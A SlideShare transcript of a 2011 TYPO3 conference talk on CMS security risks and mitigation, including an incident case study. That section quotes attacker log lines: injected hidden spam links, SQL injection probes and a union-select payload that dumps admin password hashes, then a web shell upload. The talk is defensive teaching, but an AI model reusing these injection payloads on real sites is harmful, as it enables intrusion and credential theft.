Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
TYPO3 Conference - San Francisco 2011   InspiringTYPO Security - Risks and Mitigation    sha
T3CON11 San Francisco     TYPO Security - Risks and Mitigation                    10.06.2011Helmut Hummel <helmut.hummel@t...
IntroductionAbout me   Involved in TYPO3 project since 2005   Member of the TYPO3 Security Team since 2008   TYPO3 Securit...
TYPO Security - Risks and MitigationAgenda   What is Security?   General Security Concepts   Attack Vectors   Knowing the ...
What is Security?                                       Inspiring people toTYPO Security - Risks and Mitigation   share
Is TYPO3 secure? Is my TYPO3 Site secure?                                       Inspiring people toTYPO Security - Risks a...
What is Security?Criteria for Security                                       Inspiring people toTYPO Security - Risks and ...
What is Security?Criteria for Security   Privacy                                       Inspiring people toTYPO Security - ...
What is Security?Criteria for Security   Privacy   Integrity and Property                                       Inspiring ...
What is Security?Criteria for Security   Privacy   Integrity and Property   Availability and Intentional Use              ...
Security is a process, not         a product.     (Bruce Schneier)                                       Inspiring people ...
What is Security?Security is a process                                       Inspiring people toTYPO Security - Risks and ...
What is Security?Security is a process   Care taking and improvements over time                                       Insp...
What is Security?Security is a process   Care taking and improvements over time   Depending on your needs                 ...
What is Security?Security is a process   Care taking and improvements over time   Depending on your needs   Nothing is sec...
What is Security?Why TYPO3 can be considered to be notinsecure                                       Inspiring people toTY...
What is Security?Why TYPO3 can be considered to be notinsecure   TYPO3 Security Team takes care                           ...
What is Security?Why TYPO3 can be considered to be notinsecure   TYPO3 Security Team takes care   Highly customizable for ...
What is Security?Why TYPO3 can be considered to be notinsecure   TYPO3 Security Team takes care   Highly customizable for ...
General Security Concepts                                       Inspiring people toTYPO Security - Risks and Mitigation   ...
General Security ConceptsGeneral Security Concepts                                       Inspiring people toTYPO Security ...
General Security ConceptsGeneral Security Concepts   Defense in depth                                       Inspiring peop...
General Security ConceptsGeneral Security Concepts   Defense in depth   Minimize Exposure / Least privilege               ...
General Security ConceptsGeneral Security Concepts   Defense in depth   Minimize Exposure / Least privilege               ...
General Security ConceptsGeneral Security Concepts   Defense in depth   Minimize Exposure / Least privilege   Do not rely ...
General Security ConceptsGeneral Security Concepts   Defense in depth   Minimize Exposure / Least privilege   Do not rely ...
Attack Vectors                                       Inspiring people toTYPO Security - Risks and Mitigation   share
Attack VectorsAttack Vectors                                       Inspiring people toTYPO Security - Risks and Mitigation...
Attack VectorsAttack Vectors   Security Issues in outdated TYPO3 Versions                                         Inspirin...
Attack VectorsAttack Vectors   Security Issues in outdated TYPO3 Versions   Security Issues in (outdated) TYPO3 Extensions...
Attack VectorsAttack Vectors   Security Issues in outdated TYPO3 Versions   Security Issues in (outdated) TYPO3 Extensions...
Attack VectorsAttack Vectors   Security Issues in outdated TYPO3 Versions   Security Issues in (outdated) TYPO3 Extensions...
Attack VectorsAttack Vectors   Security Issues in outdated TYPO3 Versions   Security Issues in (outdated) TYPO3 Extensions...
Attack VectorsAttack Vectors   Security Issues in outdated TYPO3 Versions   Security Issues in (outdated) TYPO3 Extensions...
Knowing the Enemy                                       Inspiring people toTYPO Security - Risks and Mitigation   share
Knowing the EnemyThe incident, how did it happen?        <div style="display:none;"><a href="http://totiyaso.tripod.com/jo...
Knowing the EnemySearching for vulnerabilities178.122.0.0 - - [17/Dec/2010:14:01:43 +0100]"GET http://www.example.com/glos...
Knowing the EnemySearching for vulnerabilities178.122.0.0 - - [17/Dec/2010:14:02:30 +0100]"GET http://www.example.com/glos...
Knowing the EnemySearching for vulnerabilities14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010  ...
Knowing the EnemySearching for vulnerabilities14:03:21: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010   ...
Knowing the EnemySearching for vulnerabilities14:03:42: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010   ...
Knowing the EnemySearching for vulnerabilities14:04:15: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 --...
Knowing the EnemyFound something!14:04:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010order by 10 --  ...
Knowing the EnemyForging the exploit14:08:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010union select ...
Knowing the EnemyExploit working!14:09:04: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=-2010union select1,2...
Knowing the Enemy15 minutes later: Log in asadmin!14:21:48: /typo3/index.php14:21:50: /typo3/backend.php                  ...
Knowing the EnemyUploading web shell14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/...
Knowing the EnemyConclusion                                       Inspiring people toTYPO Security - Risks and Mitigation ...
Knowing the EnemyConclusion   Hackers know what they are doing                                       Inspiring people toTY...
Knowing the EnemyConclusion   Hackers know what they are doing   They know TYPO3 very well                                ...
Knowing the EnemyConclusion   Hackers know what they are doing   They know TYPO3 very well   They also use automated tools...
Knowing the EnemyConclusion   Hackers know what they are doing   They know TYPO3 very well   They also use automated tools...
Knowing the EnemyConclusion   Hackers know what they are doing   They know TYPO3 very well   They also use automated tools...
Mitigation                                       Inspiring people toTYPO Security - Risks and Mitigation   share
MitiationMandatory steps                                       Inspiring people toTYPO Security - Risks and Mitigation   s...
MitiationMandatory steps   Monitor and Back Up your Website                                       Inspiring people toTYPO ...
MitiationMandatory steps   Monitor and Back Up your Website   Read the announce Mailing list and bulletins   carefully    ...
MitiationMandatory steps   Monitor and Back Up your Website   Read the announce Mailing list and bulletins   carefully   U...
MitiationMandatory steps   Monitor and Back Up your Website   Read the announce Mailing list and bulletins   carefully   U...
MitiationMandatory steps   Monitor and Back Up your Website   Read the announce Mailing list and bulletins   carefully   U...
MitiationAdvanced steps                                       Inspiring people toTYPO Security - Risks and Mitigation   sh...
MitiationAdvanced steps   Use TYPO3 Core features in favour of extensions                                         Inspirin...
MitiationAdvanced steps   Use TYPO3 Core features in favour of extensions   Use protected backend access                  ...
MitiationAdvanced steps   Use TYPO3 Core features in favour of extensions   Use protected backend access   Consider using ...
MitiationAdvanced steps   Use TYPO3 Core features in favour of extensions   Use protected backend access   Consider using ...
TYPO3 Security Team                                       Inspiring people toTYPO Security - Risks and Mitigation   share
TYPO3 Security TeamImportant things to know                                       Inspiring people toTYPO Security - Risks...
TYPO3 Security TeamImportant things to know   Responsible Disclosure Policy                                       Inspirin...
TYPO3 Security TeamImportant things to know   Responsible Disclosure Policy   One communication channel (security@typo3.or...
TYPO3 Security TeamImportant things to know   Responsible Disclosure Policy   One communication channel (security@typo3.or...
TYPO3 Security TeamImportant things to know   Responsible Disclosure Policy   One communication channel (security@typo3.or...
TYPO Security - Risks and MitigationRescources   PHP-Sicherheit (Christopher Kunz and Stefan   Esser)   Essential PHP Secu...
Questions?                                       Inspiring people toTYPO Security - Risks and Mitigation   share
Thank You!                                       Inspiring people toTYPO Security - Risks and Mitigation   share
inspiring people to share.
TYPO3 Security - Risks and Mitigation
Upcoming SlideShare
Loading in …5
×

TYPO3 Security - Risks and Mitigation

1,492 views

Published on

Published in: Technology, Business
  • Be the first to comment

  • Be the first to like this

TYPO3 Security - Risks and Mitigation

  1. 1. TYPO3 Conference - San Francisco 2011 InspiringTYPO Security - Risks and Mitigation sha
  2. 2. T3CON11 San Francisco TYPO Security - Risks and Mitigation 10.06.2011Helmut Hummel <helmut.hummel@typo3.org>
  3. 3. IntroductionAbout me Involved in TYPO3 project since 2005 Member of the TYPO3 Security Team since 2008 TYPO3 Security Team Leader since 2009 TYPO3 Core Team Member since 2011 Employed at naw.info in Hannover, Germany Twitter: helhum Blog: http://www.naw.info/blogs/typo3security/ Inspiring people toTYPO Security - Risks and Mitigation share
  4. 4. TYPO Security - Risks and MitigationAgenda What is Security? General Security Concepts Attack Vectors Knowing the Enemy: A Case Story Mitigation TYPO3 Security Team Inspiring people toTYPO Security - Risks and Mitigation share
  5. 5. What is Security? Inspiring people toTYPO Security - Risks and Mitigation share
  6. 6. Is TYPO3 secure? Is my TYPO3 Site secure? Inspiring people toTYPO Security - Risks and Mitigation share
  7. 7. What is Security?Criteria for Security Inspiring people toTYPO Security - Risks and Mitigation share
  8. 8. What is Security?Criteria for Security Privacy Inspiring people toTYPO Security - Risks and Mitigation share
  9. 9. What is Security?Criteria for Security Privacy Integrity and Property Inspiring people toTYPO Security - Risks and Mitigation share
  10. 10. What is Security?Criteria for Security Privacy Integrity and Property Availability and Intentional Use Inspiring people toTYPO Security - Risks and Mitigation share
  11. 11. Security is a process, not a product. (Bruce Schneier) Inspiring people toTYPO Security - Risks and Mitigation share
  12. 12. What is Security?Security is a process Inspiring people toTYPO Security - Risks and Mitigation share
  13. 13. What is Security?Security is a process Care taking and improvements over time Inspiring people toTYPO Security - Risks and Mitigation share
  14. 14. What is Security?Security is a process Care taking and improvements over time Depending on your needs Inspiring people toTYPO Security - Risks and Mitigation share
  15. 15. What is Security?Security is a process Care taking and improvements over time Depending on your needs Nothing is secure! Something can only be not insecure at a particular time Inspiring people toTYPO Security - Risks and Mitigation share
  16. 16. What is Security?Why TYPO3 can be considered to be notinsecure Inspiring people toTYPO Security - Risks and Mitigation share
  17. 17. What is Security?Why TYPO3 can be considered to be notinsecure TYPO3 Security Team takes care Inspiring people toTYPO Security - Risks and Mitigation share
  18. 18. What is Security?Why TYPO3 can be considered to be notinsecure TYPO3 Security Team takes care Highly customizable for your needs Inspiring people toTYPO Security - Risks and Mitigation share
  19. 19. What is Security?Why TYPO3 can be considered to be notinsecure TYPO3 Security Team takes care Highly customizable for your needs Few critical Security issues over time Inspiring people toTYPO Security - Risks and Mitigation share
  20. 20. General Security Concepts Inspiring people toTYPO Security - Risks and Mitigation share
  21. 21. General Security ConceptsGeneral Security Concepts Inspiring people toTYPO Security - Risks and Mitigation share
  22. 22. General Security ConceptsGeneral Security Concepts Defense in depth Inspiring people toTYPO Security - Risks and Mitigation share
  23. 23. General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people toTYPO Security - Risks and Mitigation share
  24. 24. General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people toTYPO Security - Risks and Mitigation share
  25. 25. General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Inspiring people toTYPO Security - Risks and Mitigation share
  26. 26. General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Log Activities Inspiring people toTYPO Security - Risks and Mitigation share
  27. 27. Attack Vectors Inspiring people toTYPO Security - Risks and Mitigation share
  28. 28. Attack VectorsAttack Vectors Inspiring people toTYPO Security - Risks and Mitigation share
  29. 29. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Inspiring people toTYPO Security - Risks and Mitigation share
  30. 30. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Inspiring people toTYPO Security - Risks and Mitigation share
  31. 31. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Inspiring people toTYPO Security - Risks and Mitigation share
  32. 32. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Inspiring people toTYPO Security - Risks and Mitigation share
  33. 33. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Inspiring people toTYPO Security - Risks and Mitigation share
  34. 34. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Other Software on the webserver Inspiring people toTYPO Security - Risks and Mitigation share
  35. 35. Knowing the Enemy Inspiring people toTYPO Security - Risks and Mitigation share
  36. 36. Knowing the EnemyThe incident, how did it happen? <div style="display:none;"><a href="http://totiyaso.tripod.com/jovian-v251-for-palmos- crack.html">Jovian v2.5.1 for PalmOS Crack</a> <a href="http://tarajoz.tripod.com/clickomania-21-for- palmos-crack.html">Clickomania 2.1 for PalmOS Crack</a> <a href="http://mujaciya.tripod.com/ ollydbg-110-xp-crack.html">OllyDbg 1.10 XP Crack</a> <a href="http://loyobusi.tripod.com/infograph- infocad-v651b-crack.html">InfoGraph InfoCAD v6.51b Crack</a> <a href="http://nisexufo.tripod.com/ customizer-xp-v15-by-tnt-crack.html">Customizer XP v1.5 by TNT Crack</a> <a href="http:// yajegoco.tripod.com/gw3dfeatures-for-solidworks-v5-crack.html">GW3Dfeatures For SolidWorks v5 Crack</ a> <a href="http://lebuvoxo.tripod.com/regrun-ii-v291-crack.html">RegRun II v2.91 Crack</a> <a href="http://ziziquy.tripod.com/stuffit-standard-v852165-crack.html">StuffIt Standard v8.5.2.165 Crack</a> <a href="http://ziziquy.tripod.com/glu3d-v1308-for-3dsmax-7-crack.html">Glu3D v1.3.08 for 3dsmax 7 Crack</a> <a href="http://yucayibu.tripod.com/cpukiller-v20-serial-by-tnt- crack.html">CPUKILLER v2.0 Serial by TNT Crack</a> <a href="http://fimegipo.tripod.com/microangelo- v55-by-aaocg-crack.html">Microangelo v5.5 by AAOCG Crack</a> <a href="http://loyobusi.tripod.com/ restoreit-deluxe-edition-v301-crack.html">RestoreIT! Deluxe Edition v3.01 Crack</a> <a href="http:// tomuxeq.tripod.com/abbyy-scanto-office-v10-crack.html">ABBYY ScanTo Office v1.0 Crack</a> <a href="http://besiluho.tripod.com/anno-domini-2002-v106-build-1-crack.html">Anno Domini 2002 v1.06 build 1 Crack</a> <a href="http://yepimal.tripod.com/serious-sam-2-plus-5-trainer-crack.html">SERIOUS SAM 2 PLUS 5 TRAINER Crack</a> <a href="http://vihuseya.tripod.com/pe-corrector-v166-by-fff- crack.html">PE Corrector v1.66 by FFF Crack</a> <a href="http://tarajoz.tripod.com/teenswebbrowser- bounce-10-crack.html">teensWebBrowser Bounce 1.0 Crack</a> <a href="http://loyobusi.tripod.com/bb- password-manager-v1011-crack.html">BB Password Manager v1.0.1.1 Crack</a> <a href="http:// reyabade.tripod.com/calendar-wizard-v2014a-crack.html">Calendar Wizard v2.0.14a Crack</a> <a href="http://gezuvak.tripod.com/1-act-personal-firewall-2006-crack.html">1-ACT Personal Firewall 2006 Crack</a> <a href="http://fimegipo.tripod.com/system-locker-112f-by-dbc-crack.html">System Locker 1.12f by DBC Crack</a> <a href="http://sehuxogo.tripod.com/nidesoft-dvd-ripper-v3062- crack.html">Nidesoft DVD Ripper v3.0.62 Crack</a> <a href="http://ziziquy.tripod.com/clonecd-v4331-by- tsrh-crack.html">CloneCD v4.3.3.1 by TSRH Crack</a> <a href="http://tihuqap.tripod.com/icon-sucker-2- pro-210072-crack.html">Icon Sucker 2 Pro 2.10.072 Crack</a> <a href="http://coqoxole.tripod.com/ primasoft-internet-optimizer-crack.html">PrimaSoft Internet Optimizer Crack</a> <a href="http:// fimegipo.tripod.com/fairstars-recorder-v201-crack.html">FairStars Recorder v2.01 Crack</a> <a href="http://nekuqoj.tripod.com/email-validation-for-net-v20crack.html">Email Validation for NET v2.0Crack</a> <a href="http://xocedeqi.tripod.com/mathworks-matlab-r2006b-3-cds-crack.html">Mathworks Matlab R2006b (3 cds) Crack</a> <a Inspiring people toTYPO Security - Risks and Mitigation share
  37. 37. Knowing the EnemySearching for vulnerabilities178.122.0.0 - - [17/Dec/2010:14:01:43 +0100]"GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93 HTTP/1.1" 20054383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" Inspiring people toTYPO Security - Risks and Mitigation share
  38. 38. Knowing the EnemySearching for vulnerabilities178.122.0.0 - - [17/Dec/2010:14:02:30 +0100]"GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+ HTTP/1.1" 20054383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" Inspiring people toTYPO Security - Risks and Mitigation share
  39. 39. Knowing the EnemySearching for vulnerabilities14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010 Inspiring people toTYPO Security - Risks and Mitigation share
  40. 40. Knowing the EnemySearching for vulnerabilities14:03:21: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 Inspiring people toTYPO Security - Risks and Mitigation share
  41. 41. Knowing the EnemySearching for vulnerabilities14:03:42: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 Inspiring people toTYPO Security - Risks and Mitigation share
  42. 42. Knowing the EnemySearching for vulnerabilities14:04:15: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 -- Inspiring people toTYPO Security - Risks and Mitigation share
  43. 43. Knowing the EnemyFound something!14:04:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010order by 10 -- Inspiring people toTYPO Security - Risks and Mitigation share
  44. 44. Knowing the EnemyForging the exploit14:08:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- Inspiring people toTYPO Security - Risks and Mitigation share
  45. 45. Knowing the EnemyExploit working!14:09:04: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=-2010union select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,username,password,admin)),20,21,22 from be_users where admin=1 --Now the hacker has the md5 hashes ofall admin passwords Inspiring people toTYPO Security - Risks and Mitigation share
  46. 46. Knowing the Enemy15 minutes later: Log in asadmin!14:21:48: /typo3/index.php14:21:50: /typo3/backend.php Inspiring people toTYPO Security - Risks and Mitigation share
  47. 47. Knowing the EnemyUploading web shell14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/realurlmanagement/14:22:46: /typo3conf/ext/realurlmanagement/title.phpYou loose! Inspiring people toTYPO Security - Risks and Mitigation share
  48. 48. Knowing the EnemyConclusion Inspiring people toTYPO Security - Risks and Mitigation share
  49. 49. Knowing the EnemyConclusion Hackers know what they are doing Inspiring people toTYPO Security - Risks and Mitigation share
  50. 50. Knowing the EnemyConclusion Hackers know what they are doing They know TYPO3 very well Inspiring people toTYPO Security - Risks and Mitigation share
  51. 51. Knowing the EnemyConclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools Inspiring people toTYPO Security - Risks and Mitigation share
  52. 52. Knowing the EnemyConclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools They often try to obfuscate the hack Inspiring people toTYPO Security - Risks and Mitigation share
  53. 53. Knowing the EnemyConclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools They often try to obfuscate the hack With automated attacks effort is low, gain is high Inspiring people toTYPO Security - Risks and Mitigation share
  54. 54. Mitigation Inspiring people toTYPO Security - Risks and Mitigation share
  55. 55. MitiationMandatory steps Inspiring people toTYPO Security - Risks and Mitigation share
  56. 56. MitiationMandatory steps Monitor and Back Up your Website Inspiring people toTYPO Security - Risks and Mitigation share
  57. 57. MitiationMandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Inspiring people toTYPO Security - Risks and Mitigation share
  58. 58. MitiationMandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Inspiring people toTYPO Security - Risks and Mitigation share
  59. 59. MitiationMandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Use saltedpasswords and advise your admins (and users) to use non obvious passwords Inspiring people toTYPO Security - Risks and Mitigation share
  60. 60. MitiationMandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Use saltedpasswords and advise your admins (and users) to use non obvious passwords Make your Integrators aware of possible TypoScript problems Inspiring people toTYPO Security - Risks and Mitigation share
  61. 61. MitiationAdvanced steps Inspiring people toTYPO Security - Risks and Mitigation share
  62. 62. MitiationAdvanced steps Use TYPO3 Core features in favour of extensions Inspiring people toTYPO Security - Risks and Mitigation share
  63. 63. MitiationAdvanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Inspiring people toTYPO Security - Risks and Mitigation share
  64. 64. MitiationAdvanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Consider using mod_security Inspiring people toTYPO Security - Risks and Mitigation share
  65. 65. MitiationAdvanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Consider using mod_security Consider using phpids TYPO3 Extension Inspiring people toTYPO Security - Risks and Mitigation share
  66. 66. TYPO3 Security Team Inspiring people toTYPO Security - Risks and Mitigation share
  67. 67. TYPO3 Security TeamImportant things to know Inspiring people toTYPO Security - Risks and Mitigation share
  68. 68. TYPO3 Security TeamImportant things to know Responsible Disclosure Policy Inspiring people toTYPO Security - Risks and Mitigation share
  69. 69. TYPO3 Security TeamImportant things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Inspiring people toTYPO Security - Risks and Mitigation share
  70. 70. TYPO3 Security TeamImportant things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Pre-Announcements for critical issues only Inspiring people toTYPO Security - Risks and Mitigation share
  71. 71. TYPO3 Security TeamImportant things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Pre-Announcements for critical issues only You can support us Inspiring people toTYPO Security - Risks and Mitigation share
  72. 72. TYPO Security - Risks and MitigationRescources PHP-Sicherheit (Christopher Kunz and Stefan Esser) Essential PHP Security (Chris Shiflett) http://www.owasp.org/ http://typo3.org/teams/security/security- bulletins/ http://typo3.org/teams/security/resources/ http://buzz.typo3.org/teams/security/ Inspiring people toTYPO Security - Risks and Mitigation share
  73. 73. Questions? Inspiring people toTYPO Security - Risks and Mitigation share
  74. 74. Thank You! Inspiring people toTYPO Security - Risks and Mitigation share
  75. 75. inspiring people to share.

×